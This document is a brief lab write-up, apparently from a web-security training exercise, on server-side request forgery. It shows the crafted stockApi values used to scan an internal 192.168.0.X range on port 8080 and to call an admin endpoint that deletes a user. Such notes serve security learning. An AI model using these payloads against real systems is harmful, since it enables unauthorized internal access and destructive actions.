Lab #2: Basic SSRF against another back-end system

check feature - fetches data from an internal system

End goal: 
- scan internal 192.168.0.X range for admin interface on port 8080
- delete user carlos

Analysis:

1. Scan internal 192.168.0.X range 

stockApi=http://192.168.0.1:8080/admin

X: 0 -> 255
port 8080

status code 400 - bad request error
status code 500 - internal server error
status code 200 -> run 

X = 67

2. Delete carlos

stockApi=http://192.168.0.67:8080/admin/delete?username=carlos